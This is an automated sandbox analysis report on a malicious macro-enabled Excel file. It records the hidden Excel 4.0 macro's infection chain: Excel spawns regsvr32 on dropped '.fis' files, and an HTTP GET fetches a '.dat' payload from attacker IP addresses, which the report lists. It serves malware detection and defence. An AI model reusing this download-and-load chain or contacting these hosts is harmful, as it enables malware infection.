Play interactive tour

Edit tour

Windows Analysis Report Permission-40776837-06252021.xlsm

Overview

General Information

Sample Name:	Permission-40776837-06252021.xlsm
Analysis ID:	440654
MD5:	2cd2fd004b5589a595239f202ac648ae
SHA1:	ac02da8a953fd89f325c64bf5df93e415350ec12
SHA256:	ad3071800cd6852215e7ffcc6c65e7104e3d6e10bccfffc8249d73be0512d6dd
Tags:	xlsm
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Sigma detected: Microsoft Office Product Spawning Windows Shell

Excel documents contains an embedded macro which executes code when the document is opened

IP address seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 3508 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

regsvr32.exe (PID: 3120 cmdline: regsvr32 ..\Kro.fis MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 4640 cmdline: regsvr32 ..\Kro.fis1 MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 4688 cmdline: regsvr32 ..\Kro.fis2 MD5: 426E7499F6A7346F0410DEAD0805586B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\Kro.fis, CommandLine: regsvr32 ..\Kro.fis, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3508, ProcessCommandLine: regsvr32 ..\Kro.fis, ProcessId: 3120

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Source: global traffic

TCP traffic: 192.168.2.3:49729 -> 185.183.99.120:80

Source: global traffic

TCP traffic: 192.168.2.3:49710 -> 185.240.103.219:80

Source: Joe Sandbox View	IP Address: 190.14.37.3 190.14.37.3
Source: Joe Sandbox View	IP Address: 185.183.99.120 185.183.99.120
Source: Joe Sandbox View	IP Address: 185.240.103.219 185.240.103.219

Source: global traffic

HTTP traffic detected: GET /44372.78513125.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.183.99.120Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknown	TCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknown	TCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknown	TCP traffic detected without corresponding DNS query: 185.183.99.120

Source: global traffic

Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.office.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://augloop.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://cdn.entity.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://cortana.ai
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://cr.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://directory.services.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://graph.windows.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://login.windows.local
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://management.azure.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://management.azure.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://osi.office.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://tasks.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing from the ' yellow bar above. 21 ) :: PROTECTED VIEW Be careful-files from the Int
Source: Screenshot number: 8	Screenshot OCR: Enable Editing from the ' yellow bar above. 21 ) 22_ PROTECTED VIEW Be careful-files from the In
